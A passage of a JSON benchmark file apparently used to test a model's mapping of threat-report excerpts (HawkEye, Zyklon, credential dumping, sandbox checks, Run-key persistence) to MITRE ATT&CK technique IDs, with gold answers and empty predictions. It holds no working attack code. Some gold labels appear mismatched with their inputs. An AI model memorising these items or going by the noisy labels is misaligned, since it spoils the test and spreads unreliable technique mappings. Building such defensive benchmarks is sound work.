downloading data that will contain the command and control (C2) server(s) and port(s) to be used by Comnie\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", "input": "\nHawkEye offers the following exfiltration options based on the configuration: email, FTP, SFTP, HTTP POST to PanelURL API or ProxyURL.As mentioned above, in the comments of the main loop section, it also comes with several anti-analysis features, including starting an anti-debugging thread or disabling certain AV-related programs via the Image File Execution Options (IFEO) evasion technique by registering invalid debuggers that redirect and effectively disable various system and security applications.The following diagram summarizes the full infection process:ConclusionRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward", "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I\u2019m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I\u2019m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon\u2019s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows\n\t - T1078.003: Valid Accounts - Local Accounts\n- Text: APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.\n\t - T1078.004: Valid Accounts - Cloud Accounts\n- Text: CreepySnail can use stolen credentials to authenticate on target networks.\n\t - T1078.002: Valid Accounts - Domain Accounts\n", "input": "\nhas used valid accounts for privilege escalation.", "gold": "- T1078: Valid Accounts", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Posted on . May 23, 2017 . (May 2, 2022) . by Raphael Mudge . Cobalt Strike 3.8 is now available. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. These commands offer means to spawn a payload, in another desktop session, without remote process injection. As detection of remote process injection becomes more common, it\u2019s important to have other ways to achieve our goals without this offensive technique. The Resource Kit . Cobalt Strike 3.8\u2019s Resource Kit finally gives you a way to change Cobalt Strike\u2019s built-in script templates. The Resource Kit is a collection of Cobalt Strike\u2019s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. Go to Help -> Arsenal from a licensed copy of Cobalt Strike to download the Resource Kit. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows. A 21-day Cobalt Strike trial is also available\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: The decompressed PowerShell payload has some similarities to the PowerShell Empire agent, such as the use of a jitter value and commands referred to by job ID, but we do not have conclusive evidence that the author of this tool used Empire as a basis for their tool\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: CopyKittens has used \"-w hidden\" and \"-windowstyle hidden\" to conceal PowerShell windows.\n\t - T1564.003: Hide Artifacts - Hidden Window\n", "input": "\nuses PowerShell to execute various commands, one to execute its payload.", "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mongall can upload files and information from a compromised host to its C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: This thread searches for for files with the following extensions on fixed drives and sends them to C2 every 60 minutes\n\t - T1020: Automated Exfiltration\n- Text: WellMail can archive files on the compromised host.\n\t - T1560: Archive Collected Data\n", "input": "\nAfter data is collected by malware, it is exfiltrated over the existing C2 channel.", "gold": "- T1041: Exfiltration Over C2 Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: kills and disables services for Windows Firewall, Windows Security Center, and Windows Defender.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: MegaCortex can stop and disable services on the system.\n\t - T1489: Service Stop\n- Text: Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n", "input": "\nkills antimalware running process.", "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don\u2019t have any content with social engineering directing potential victims to click an Enable Content button. It seems that the attackers are depending on the victims to decide entirely on their own whether to click it or not\n\t - T1204.002: User Execution - Malicious File\n- Text: In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject \u201c\u041f\u0430\u043c\u044f\u0442\u043a\u0430 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u201d (Information Security Notice) and contained a Microsoft Word attachment named \u201c\u0441\u0432\u043e\u0434\u043a\u04301705.doc\u201d (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line \u201c\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u201d (security) and a Microsoft Word attachment (Figure 4) \u201c\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.doc\u201d (Safety requirements\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Koadic performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nThe initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kevin can use a custom protocol tunneled through DNS or HTTP.\n\t - T1572: Protocol Tunneling\n- Text: uses port 46769 for C2.\n\t - T1571: Non-Standard Port\n- Text: DarkWatchman uses HTTPS for command and control.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nhas used HTTP and HTTPS for C2 communications.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Saint Bot can deobfuscate strings and files for execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.\n\t - T1027: Obfuscated Files or Information\n- Text: Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\t - T1560: Archive Collected Data\n", "input": "\nThe decrypted contents of the log file adhere to the format in Figure 22", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LazyScripter has used PowerShell scripts to execute malicious code.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Emotet has used cmd.exe to run a PowerShell script.\n\t - T1059: Command and Scripting Interpreter\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: REvil has used obfuscated VBA macros for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nBoth variants need to be executed with the command line argument \u201c[2]\u201d to avoid continually attempting to copy and execute the Trojan using the \u201ctmp.vbs\u201d and \u201ctmp1.vbs\u201d files", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Hydraq connects to a predefined domain on port 443 to exfil gathered information.\n\t - T1048: Exfiltration Over Alternative Protocol\n- Text: When a document is found matching one of the extensions in the configuration, uploads it to the C2 server.\n\t - T1020: Automated Exfiltration\n", "input": "\nhas used FTP to exfiltrate collected data.", "gold": "- T1048: Exfiltration Over Alternative Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Waterbear can inject decrypted shellcode into the LanmanServer service.\n\t - T1055: Process Injection\n- Text: A Lazarus Group malware sample performs reflective DLL injection.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: 2.\u00a0\u00a0\u00a0\u00a0 The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3.\u00a0\u00a0\u00a0\u00a0 The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe\u00a0:\u00a0GUP, a free (LGPL) Generic Updater.\u00a0GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n", "input": "\nThe plugin URL is stored in file in following format: /plugin/index.php?plugin= The following plugins are found in the memory of the Zyklon malware: /plugin/index.php?plugin=cuda /plugin/index.php?plugin=minerd /plugin/index.php?plugin=sgminer /plugin/index.php?plugin=socks /plugin/index.php?plugin=tor /plugin/index.php?plugin=games /plugin/index.php?plugin=software /plugin/index.php?plugin=ftp /plugin/index.php?plugin=email /plugin/index.php?plugin=browser The downloaded plugins are injected into: Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing\n- T1068: Exploitation for Privilege Escalation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc\n\t - T1105: Ingress Tool Transfer\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nmay create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can obtain passwords from common browsers and FTP clients.\n\t - T1003: OS Credential Dumping\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: The Warzone RAT can steal credentials from the Outlook and Thunderbird email clients as shown in the image below (figure 10\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: For the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password: Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs: On the left, we have the ROKRAT sample and on the right the FreeMilk sample\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n", "input": "\nhas used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Mozilla password manager, Google Chrome password manager, Outlook, Internet Explorer, and Windows Credential Store.", "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n", "input": "\nMouse Pointer Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_PointingDevice \u00a0 The Trojan will check the Caption, Description, HardwareType, InfSection, Manufacturer and Name fields in the results for the string VMware, Virtual, VBox, VM or Oracle", "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1497: Virtualization/Sandbox Evasion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used for credential dumping, as well as Metasploit\u2019s NTDSGRAB module to obtain a copy of the victim's Active Directory database.\n\t - T1003: OS Credential Dumping\n- Text: Dragonfly has dropped and executed SecretsDump to dump password hashes.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: MimiPenguin can dump process memory and extract clear-text credentials.\n\t - T1003.007: OS Credential Dumping - Proc Filesystem\n", "input": "\ncan dump process memory and extract clear-text credentials.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cuba can use the function \"GetIpNetTable\" to recover the last connections to the victim's machine.\n\t - T1049: System Network Connections Discovery\n- Text: has used custom DNS Tunneling protocols for C2.\n\t - T1095: Non-Application Layer Protocol\n- Text: Common TCP ports 80 and 443 are used to blend in with routine network traffic\n\t - T1571: Non-Standard Port\n\t - T1043: Commonly Used Port\n", "input": "\nuses to list TCP connection status.", "gold": "- T1049: System Network Connections Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used batch scripts to enumerate network information, including information about trusts, zones, and the domain.\n\t - T1016: System Network Configuration Discovery\n- Text: Commands such as \"net use\" and \"net session\" can be used in Net to gather information about network connections from a particular host.\n\t - T1049: System Network Connections Discovery\n- Text: Flagpro has been used to execute \"net view\" on a targeted system.\n\t - T1018: Remote System Discovery\n", "input": "\nactors used the following command after exploiting a machine with malware to acquire information about local networks: ipconfig /all >> %temp%\\download", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lizar can collect the computer name from the machine,.\n\t - T1082: System Information Discovery\n- Text: QakBot can use \"net config workstation\", \"arp -a\", and \"ipconfig /all\" to gather network configuration information.\n\t - T1016: System Network Configuration Discovery\n- Text: BabyShark has executed the \"whoami\" command.\n\t - T1033: System Owner/User Discovery\n", "input": "\ncollects registered owner details by using the commands systeminfo and net config workstation.", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used Mimikatz to dump certificates and private keys from the Windows certificate store.\n\t - T1552.004: Unsecured Credentials - Private Keys\n- Text: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: AADInternals can gather unsecured credentials for Azure AD services, such as Azure AD Connect, from a local machine.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", "input": "\nDPAPI module can harvest protected credentials stored and/or cached by browsers and other user applications by interacting with Windows cryptographic application programming interface (API) functions.", "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a backdoor through which remote attackers can monitor services.\n\t - T1007: System Service Discovery\n- Text: AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.\n\t - T1526: Cloud Service Discovery\n- Text: AIRBREAK: a JavaScript-based backdoor also reported as \u201cOrz\u201d that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool\n\t - T1018: Remote System Discovery\n\t - T1135: Network Share Discovery\n\t - T1046: Network Service Discovery\n\t - T1087.001: Account Discovery - Local Account\n", "input": "\ncan enumerate services.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: SLOWDRIFT uses cloud based services for C2.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Mythic provides various transform functions to encode and/or randomize C2 data.\n\t - T1132: Data Encoding\n", "input": "\nOne of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server", "gold": "- T1102: Web Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can use \"sudo\" to run a command.\n\t - T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching\n- Text: Skidmap has the ability to add the public key of its handlers to the \"authorized_keys\" file to maintain persistence on an infected host.\n\t - T1098.004: Account Manipulation - SSH Authorized Keys\n", "input": "\nmodifies the tty_tickets line in the sudoers file.", "gold": "- T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: can overwrite Registry settings to reduce its visibility on the victim.\n\t - T1070: Indicator Removal\n- Text: APT32 has cleared select event log entries.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n", "input": "\nBoth \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.txt\u201d and \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d are then deleted", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: File Indicators Samples Observed from Spear Phishing Messages Above Filename Chinas_Arctic_Dream.doc File Size 6587812 bytes MD5 598eeb6a18233023f3551097aa49b083 SHA1 e9a46966f93fe15c22636a5033c61c725add8fa5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe\n\t - T1036: Masquerading\n\t - T1083: File and Directory Discovery\n- Text: malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt.\n\t - T1012: Query Registry\n- Text: Honeybee adds collected files to a 